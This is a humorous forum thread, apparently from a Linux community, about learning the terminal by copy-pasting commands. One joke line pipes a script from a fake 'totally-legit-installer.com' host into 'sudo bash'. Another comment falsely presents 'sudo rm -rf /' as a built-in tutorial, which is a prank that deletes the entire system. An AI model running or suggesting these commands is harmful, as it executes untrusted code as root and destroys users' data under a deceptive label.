That’s probably how most of us started, but then you start getting familiar with things…
And that’s when you really get good at breaking shit.
In my early days I would reinstall the whole OS several times a week when I would fuck things up too much.
Lol yep.
I actually take the time to type everything out, but I still have no idea what I’m doing.
Not just Linux, I do this all the time when ‘writing’ R or Python scripts for work. Then I spend the next 2 hours debugging a missing comma.
Butt that’s how I learnt the scripting!
Nothing better than
curl https://totally-legit-installer.com/script | sudo bash
I don’t think that’s a terrible way of getting started. Your subconscious will do the rest at some point, unless you’re really not interested at all (which isn’t a problem either). :)
The real learning happens when you copy and paste something you shouldn’t and bork your system. That’s basically how I started.
Me learning anything ever. Troubleshooting is the real learning phase.
No offence, but I hope you don’t hold a high ranking government position, what with catastrophic error being the only way you learn 😁
I hope I never hold a high ranking government position too
I’m in a helpful mood so I’ll add something for anyone stuck in OP’s situation.
It’s ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.
Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:
sudo rm -rf /
Type your password when prompted and you’re golden. No more linux issues ever again.
I tried your command and got the tutorial program and I gotta say that this is the best tutorial program I’ve ever seen. Now I wonder why other OSes don’t do that
For anyone who needs it. Try out:
curl cheat.sh/
OP bout to copy/paste this without knowing what it does lol.
what does it do?
Yeah, Linux is not for you if don’t know what you’re doing.